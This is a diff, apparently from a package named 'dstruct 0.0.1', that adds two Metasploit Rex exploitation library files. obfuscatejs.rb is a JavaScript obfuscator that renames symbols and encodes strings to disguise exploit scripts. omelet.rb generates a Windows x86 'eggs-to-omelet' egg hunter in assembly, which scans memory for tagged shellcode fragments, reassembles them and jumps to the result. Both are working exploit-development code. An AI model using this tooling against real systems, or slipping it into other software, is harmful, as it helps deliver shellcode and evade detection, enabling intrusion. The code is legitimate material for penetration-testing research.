dstruct 0.0.1

data/lib/rex/exploitation/obfuscatejs.rb

@@ -0,0 +1,336 @@
+# -*- coding: binary -*-
+require 'rex/text'
+module Rex
+module Exploitation
+
+#
+# Obfuscates javascript in various ways
+#
+class ObfuscateJS
+  attr_reader :opts
+
+  #
+  # Obfuscates a javascript string.
+  #
+  # Options are 'Symbols', described below, and 'Strings', a boolean
+  # which specifies whether strings within the javascript should be
+  # mucked with (defaults to false).
+  #
+  # The 'Symbols' argument should have the following format:
+  #
+  #   {
+  #      'Variables'  => [ 'var1', ... ],
+  #      'Methods'    => [ 'method1', ... ],
+  #      'Namespaces' => [ 'n', ... ],
+  #      'Classes'    => [ { 'Namespace' => 'n', 'Class' => 'y'}, ... ]
+  #   }
+  #
+  # Make sure you order your methods, classes, and namespaces by most
+  # specific to least specific to prevent partial substitution.  For
+  # instance, if you have two methods (joe and joeBob), you should place
+  # joeBob before joe because it is more specific and will be globally
+  # replaced before joe is replaced.
+  #
+  # A simple example follows:
+  #
+  # <code>
+  # js = ObfuscateJS.new <<ENDJS
+  #     function say_hi() {
+  #         var foo = "Hello, world";
+  #         document.writeln(foo);
+  #     }
+  # ENDJS
+  # js.obfuscate(
+  #     'Symbols' => {
+  #	       'Variables' => [ 'foo' ],
+  #	       'Methods'   => [ 'say_hi' ]
+  #	  }
+  #     'Strings' => true
+  # )
+  # </code>
+  #
+  # which should generate something like the following:
+  #
+  # <code>
+  # function oJaDYRzFOyJVQCOHk() { var cLprVG = "\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64"; document.writeln(cLprVG); }
+  # </code>
+  #
+  # String obfuscation tries to deal with escaped quotes within strings but
+  # won't catch things like
+  #     "\\"
+  # so be careful.
+  #
+  def self.obfuscate(js, opts = {})
+    ObfuscateJS.new(js).obfuscate(opts)
+  end
+
+  #
+  # Initialize an instance of the obfuscator
+  #
+  def initialize(js = "", opts = {})
+    @js      = js
+    @dynsym  = {}
+    @opts    = {
+      'Symbols' => {
+        'Variables'=>[],
+        'Methods'=>[],
+        'Namespaces'=>[],
+        'Classes'=>[]
+      },
+      'Strings'=>false
+    }
+    @done = false
+    update_opts(opts) if (opts.length > 0)
+  end
+
+  def update_opts(opts)
+    if (opts.nil? or opts.length < 1)
+      return
+    end
+    if (@opts['Symbols'] && opts['Symbols'])
+      ['Variables', 'Methods', 'Namespaces', 'Classes'].each { |k|
+        if (@opts['Symbols'][k] && opts['Symbols'][k])
+          opts['Symbols'][k].each { |s|
+            if (not @opts['Symbols'][k].include? s)
+              @opts['Symbols'][k].push(s)
+            end
+          }
+        elsif (opts['Symbols'][k])
+          @opts['Symbols'][k] = opts['Symbols'][k]
+        end
+      }
+    elsif opts['Symbols']
+      @opts['Symbols'] = opts['Symbols']
+    end
+    @opts['Strings'] ||= opts['Strings']
+  end
+
+  #
+  # Returns the dynamic symbol associated with the supplied symbol name
+  #
+  # If obfuscation has not yet been performed (i.e. obfuscate() has not been
+  # called), then this method simply returns its argument
+  #
+  def sym(name)
+    @dynsym[name] || name
+  end
+
+  #
+  # Obfuscates the javascript string passed to the constructor
+  #
+  def obfuscate(opts = {})
+    #return @js if (@done)
+    @done = true
+
+    update_opts(opts)
+
+    if (@opts['Strings'])
+      obfuscate_strings()
+
+      # Full space randomization does not work for javascript -- despite
+      # claims that space is irrelavent, newlines break things.  Instead,
+      # use only space (0x20) and tab (0x09).
+
+      #@js.gsub!(/[\x09\x20]+/) { |s|
+      #	len = rand(50)+2
+      #	set = "\x09\x20"
+      #	buf = ''
+      #	while (buf.length < len)
+      #		buf << set[rand(set.length)].chr
+      #	end
+      #
+      #	buf
+      #}
+    end
+
+    # Remove our comments
+    remove_comments
+
+    # Globally replace symbols
+    replace_symbols(@opts['Symbols']) if @opts['Symbols']
+
+    return @js
+  end
+
+  #
+  # Returns the replaced javascript string
+  #
+  def to_s
+    @js
+  end
+  alias :to_str :to_s
+
+  def <<(str)
+    @js << str
+  end
+  def +(str)
+    @js + str
+  end
+
+protected
+  attr_accessor :done
+
+  #
+  # Get rid of both single-line C++ style comments and multiline C style comments.
+  #
+  # Note: embedded comments (e.g.: "/*/**/*/") will break this,
+  # but they also break real javascript engines so I don't care.
+  #
+  def remove_comments
+    @js.gsub!(%r{\s+//.*$}, '')
+    @js.gsub!(%r{/\*.*?\*/}m, '')
+  end
+
+  # Replace method, class, and namespace symbols found in the javascript
+  # string
+  def replace_symbols(symbols)
+    taken = { }
+
+    # Generate random symbol names
+    [ 'Variables', 'Methods', 'Classes', 'Namespaces' ].each { |symtype|
+      next if symbols[symtype].nil?
+      symbols[symtype].each { |sym|
+        dyn = Rex::Text.rand_text_alpha(rand(32)+1) until dyn and not taken.key?(dyn)
+
+        taken[dyn] = true
+
+        if symtype == 'Classes'
+          full_sym = sym['Namespace'] + "." + sym['Class']
+          @dynsym[full_sym] = dyn
+
+          @js.gsub!(/#{full_sym}/) { |m|
+            sym['Namespace'] + "." + dyn
+          }
+        else
+          @dynsym[sym] = dyn
+
+          @js.gsub!(/#{sym}/, dyn)
+        end
+      }
+    }
+  end
+
+  #
+  # Change each string into some javascript that will generate that string
+  #
+  # There are a couple of caveats to using string obfuscation:
+  #   * it tries to deal with escaped quotes within strings but won't catch
+  #     things like: "\\"
+  #   * depending on the random choices, this can easily balloon a short
+  #     string up to hundreds of kilobytes if called multiple times.
+  # so be careful.
+  #
+  def obfuscate_strings()
+    @js.gsub!(/".*?[^\\]"|'.*?[^\\]'/) { |str|
+      buf = ''
+      quote = str[0,1]
+      # Pull the quotes off either end
+      str = str[1, str.length-2]
+      case (rand(2))
+      # Disable hex encoding for now.  It's just too big a hassle.
+      #when 0
+      #	# This is where we can run into trouble with generating
+      #	# incorrect code.  If we hex encode a string twice, the second
+      #	# encoding will generate the first instead of the original
+      #	# string.
+      #	if str =~ /\\x/
+      #		# Always have to remove spaces from strings so the space
+      #		# randomization doesn't mess with them.
+      #		buf = quote + str.gsub(/ /, '\x20') + quote
+      #	else
+      #		buf = '"' + Rex::Text.to_hex(str) + '"'
+      #	end
+      when 0
+        #
+        # Escape sequences when naively encoded for unescape become a
+        # literal backslash instead of the intended meaning.  To avoid
+        # that problem, we scan the string for escapes and leave them
+        # unmolested.
+        #
+        buf << 'unescape("'
+        bytes = str.unpack("C*")
+        c = 0
+        while bytes[c]
+          if bytes[c].chr == "\\"
+            # XXX This is pretty slow.
+            esc_len = parse_escape(bytes, c)
+            buf << bytes[c, esc_len].map{|a| a.chr}.join
+            c += esc_len
+            next
+          end
+          buf << "%%%0.2x"%(bytes[c])
+          # Break the string into smaller strings
+          if bytes[c+1] and rand(10) == 0
+            buf << '" + "'
+          end
+          c += 1
+        end
+        buf << '")'
+      when 1
+        buf = "String.fromCharCode( "
+        bytes = str.unpack("C*")
+        c = 0
+        while bytes[c]
+          if bytes[c].chr == "\\"
+            case bytes[c+1].chr
+            # For chars that contain their non-escaped selves, step
+            # past the backslash and let the rand() below decide
+            # how to represent the character.
+            when '"'; c += 1
+            when "'"; c += 1
+            when "\\"; c += 1
+            # For others, just take the hex representation out of
+            # laziness.
+            when "n"; buf << "0x0a"; c += 2; next
+            when "t"; buf << "0x09"; c += 2; next
+            # Lastly, if it's a hex, unicode, or octal escape,
+            # leave it, and anything after it, alone.  At some
+            # point we may want to parse up to the end of the
+            # escapes and encode subsequent non-escape characters.
+            # Since this is the lazy way to do it, spaces after an
+            # escape sequence will get away unmodified.  To prevent
+            # the space randomizer from hosing the string, convert
+            # spaces specifically.
+            else
+              buf = buf[0,buf.length-1] + " )"
+              buf << ' + ("' + bytes[c, bytes.length].map{|a| a==0x20 ? '\x20' : a.chr}.join + '" '
+              break
+            end
+          end
+          case (rand(3))
+          when 0
+            buf << " %i,"%(bytes[c])
+          when 1
+            buf << " 0%o,"%(bytes[c])
+          when 2
+            buf << " 0x%0.2x,"%(bytes[c])
+          end
+          c += 1
+        end
+        # Strip off the last comma
+        buf = buf[0,buf.length-1] + " )"
+      end
+      buf
+    }
+    @js
+  end
+
+  def parse_escape(bytes, offset)
+    esc_len = 0
+    if bytes[offset].chr == "\\"
+      case bytes[offset+1].chr
+      when "u"; esc_len = 6     # unicode \u1234
+      when "x"; esc_len = 4     # hex, \x41
+      when /[0-9]/              # octal, \123, \0
+        oct = bytes[offset+1, 4].map{|a|a.chr}.join
+        oct =~ /([0-9]+)/
+        esc_len = 1 + $1.length
+      else; esc_len = 2         # \" \n, etc.
+      end
+    end
+    esc_len
+  end
+end
+
+end
+end

data/lib/rex/exploitation/omelet.rb

@@ -0,0 +1,321 @@
+# -*- coding: binary -*-
+require 'rex/text'
+require 'rex/arch'
+require 'metasm'
+
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides an interface to generating an eggs-to-omelet hunter for win/x86.
+#
+# Written by corelanc0d3r <peter.ve@corelan.be>
+#
+###
+class Omelet
+
+  ###
+  #
+  # Windows-based eggs-to-omelet hunters
+  #
+  ###
+  module Windows
+    Alias = "win"
+
+    module X86
+      Alias = ARCH_X86
+
+      #
+      # The hunter stub for win/x86.
+      #
+      def hunter_stub
+        {
+          # option hash members go here (currently unused)
+        }
+      end
+
+    end
+  end
+
+  ###
+  #
+  # Generic interface
+  #
+  ###
+
+  #
+  # Creates a new hunter instance and acquires the sub-class that should
+  # be used for generating the stub based on the supplied platform and
+  # architecture.
+  #
+  def initialize(platform, arch = nil)
+    Omelet.constants.each { |c|
+      mod = self.class.const_get(c)
+
+      next if ((!mod.kind_of?(::Module)) or (!mod.const_defined?('Alias')))
+
+      if (platform =~ /#{mod.const_get('Alias')}/i)
+        self.extend(mod)
+
+        if (arch and mod)
+          mod.constants.each { |a|
+            amod = mod.const_get(a)
+
+            next if ((!amod.kind_of?(::Module)) or
+              (!amod.const_defined?('Alias')))
+
+            if (arch =~ /#{mod.const_get(a).const_get('Alias')}/i)
+                amod = mod.const_get(a)
+
+                self.extend(amod)
+              end
+            }
+          end
+        end
+      }
+    end
+
+    #
+    # This method generates an eggs-to-omelet hunter using the derived hunter stub.
+    #
+    def generate(payload, badchars = '', opts = {})
+
+      eggsize       = opts[:eggsize] || 123
+      eggtag        = opts[:eggtag] || "00w"
+      searchforward = opts[:searchforward] || true
+      reset         = opts[:reset]
+      startreg      = opts[:startreg]
+      usechecksum   = opts[:checksum]
+      adjust        = opts[:adjust] || 0
+
+      return nil if ((opts = hunter_stub) == nil)
+
+      # calculate number of eggs
+      payloadlen = payload.length
+      delta = payloadlen / eggsize
+      delta = delta * eggsize
+      nr_eggs = payloadlen / eggsize
+      if delta < payloadlen
+        nr_eggs = nr_eggs+1
+      end
+
+      nr_eggs_hex = "%02x" % nr_eggs
+      eggsize_hex = "%02x" % eggsize
+
+      hextag = ''
+      eggtag.each_byte do |thischar|
+        decchar = "%02x" % thischar
+        hextag = decchar + hextag
+      end
+      hextag = hextag + "01"
+
+      # search forward or backward ?
+      setflag      = nil
+      searchstub1  = nil
+      searchstub2  = nil
+      flipflagpre  = ''
+      flipflagpost = ''
+      checksum     = ''
+
+      if searchforward
+        # clear direction flag
+        setflag     = "cld"
+        searchstub1 = "dec edx\n\tdec edx\n\tdec edx\n\tdec edx"
+        searchstub2 = "inc edx"
+      else
+        # set the direction flag
+        setflag      = "std"
+        searchstub1  = "inc edx\n\tinc edx\n\tinc edx\n\tinc edx"
+        searchstub2  = "dec edx"
+        flipflagpre  = "cld\n\tsub esi,-8"
+        flipflagpost = "std"
+      end
+
+      # will we have to adjust the destination address ?
+      adjustdest = ''
+      if adjust > 0
+        adjustdest = "\n\tsub edi,#{adjust}"
+      elsif adjust < 0
+        adjustdest = "\n\tadd edi,#{adjust}"
+      end
+
+      # prepare the stub that starts the search
+      startstub = ''
+      if startreg
+        if startreg.downcase != 'ebp'
+          startstub << "mov ebp,#{startreg}"
+        end
+        startstub << "\n\t" if startstub.length > 0
+        startstub << "mov edx,ebp"
+      end
+      # a register will be used as start location for the search
+      startstub << "\n\t" if startstub.length > 0
+      startstub << "push esp\n\tpop edi\n\tor di,0xffff"
+      startstub << adjustdest
+      # edx will be used, start at end of stack frame
+      if not startreg
+        startstub << "\n\tmov edx,edi"
+        if reset
+          startstub << "\n\tpush edx\n\tpop ebp"
+        end
+      end
+
+      # reset start after each egg was found ?
+      # will allow to find eggs when they are out of order/sequence
+      resetstart = ''
+      if reset
+        resetstart = "push ebp\n\tpop edx"
+      end
+
+         		#checksum code by dijital1 & corelanc0d3r
+      if usechecksum
+        checksum = <<EOS
+  xor ecx,ecx
+  xor eax,eax
+calc_chksum_loop:
+  add al,byte [edx+ecx]
+  inc ecx
+  cmp cl, egg_size
+  jnz calc_chksum_loop
+test_chksum:
+  cmp al,byte [edx+ecx]
+  jnz find_egg
+EOS
+      end
+
+      # create omelet code
+      omelet_hunter = <<EOS
+
+  nr_eggs equ 0x#{nr_eggs_hex}	; number of eggs
+  egg_size equ 0x#{eggsize_hex} 	; nr bytes of payload per egg
+  hex_tag equ 0x#{hextag}		; tag
+
+  #{setflag}			; set/clear direction flag
+  jmp start
+
+  ; routine to calculate the target location
+  ; for writing recombined shellcode (omelet)
+  ; I'll use EDI as target location
+  ; First, I'll make EDI point to end of stack
+  ; and I'll put the number of shellcode eggs in eax
+get_target_loc:
+  #{startstub}		; use edx as start location for the search
+  xor eax,eax		; zero eax
+  mov al,nr_eggs		; put number of eggs in eax
+
+calc_target_loc:
+  xor esi,esi		; use esi as counter to step back
+  mov si,0-(egg_size+20)	; add 20 bytes of extra space, per egg
+
+get_target_loc_loop:	; start loop
+  dec edi		; step back
+  inc esi		; and update ESI counter
+  cmp si,-1	; continue to step back until ESI = -1
+  jnz get_target_loc_loop
+  dec eax		; loop again if we did not take all pieces
+               ; into account yet
+  jnz calc_target_loc
+
+  ; edi now contains target location
+  ; for recombined shellcode
+  xor ebx,ebx		; put loop counter in ebx
+  mov bl,nr_eggs+1
+  ret
+
+start:
+  call get_target_loc	; jump to routine which will calculate shellcode dst address
+
+  ; start looking for eggs, using edx as basepointer
+  jmp search_next_address
+
+find_egg:
+  #{searchstub1}		; based on search direction
+
+search_next_address:
+  #{searchstub2}		; based on search direction
+  push edx		; save edx
+  push 0x02   ; use NtAccessCheckAndAuditAlarm syscall
+  pop eax		; set eax to 0x02
+  int 0x2e
+  cmp al,0x5		; address readable ?
+  pop edx		; restore edx
+  je search_next_address  ; if addressss is not readable, go to next address
+
+  mov eax,hex_tag	; if address is readable, prepare tag in eax
+  add eax,ebx		; add offset (ebx contains egg counter, remember ?)
+  xchg edi,edx		; switch edx/edi
+  scasd			; edi points to the tag ?
+  xchg edi,edx		; switch edx/edi back
+  jnz find_egg		; if tag was not found, go to next address
+  ;found the tag at edx
+
+   ;do we need to verify checksum ? (prevents finding corrupted eggs)
+   #{checksum}
+
+copy_egg:
+  ; ecx must first be set to egg_size (used by rep instruction) and esi as source
+  mov esi,edx		; set ESI = EDX (needed for rep instruction)
+  xor ecx,ecx
+  mov cl,egg_size	; set copy counter
+  #{flipflagpre}		; flip destination flag if necessary
+  rep movsb		; copy egg from ESI to EDI
+  #{flipflagpost}		; flip destination flag again if necessary
+  dec ebx		; decrement egg
+  #{resetstart}		; reset start location if necessary
+  cmp bl,1		; found all eggs ?
+  jnz find_egg		; no = look for next egg
+  ; done - all eggs have been found and copied
+
+done:
+  call get_target_loc	; re-calculate location where recombined shellcode is placed
+  cld
+  jmp edi		; and jump to it :)
+EOS
+
+      the_omelet = Metasm::Shellcode.assemble(Metasm::Ia32.new, omelet_hunter).encode_string
+
+      # create the eggs array
+      total_size = eggsize * nr_eggs
+      padlen = total_size - payloadlen
+      payloadpadding = "A" * padlen
+
+      fullcode = payload + payloadpadding
+      eggcnt = nr_eggs + 2
+      startcode = 0
+
+      eggs = []
+      while eggcnt > 2 do
+        egg_prep = eggcnt.chr + eggtag
+        this_egg = fullcode[startcode, eggsize]
+            if usechecksum
+          cksum = 0
+          this_egg.each_byte { |b|
+            cksum += b
+          }
+          this_egg << [cksum & 0xff].pack('C')
+        end
+
+        this_egg = egg_prep + this_egg
+        eggs << this_egg
+
+        eggcnt -= 1
+        startcode += eggsize
+      end
+
+      return [ the_omelet, eggs ]
+    end
+
+protected
+
+  #
+  # Stub method that is meant to be overridden.  It returns the raw stub that
+  # should be used as the omelet maker (combine the eggs).
+  #
+  def hunter_stub
+  end
+
+end
+end
+end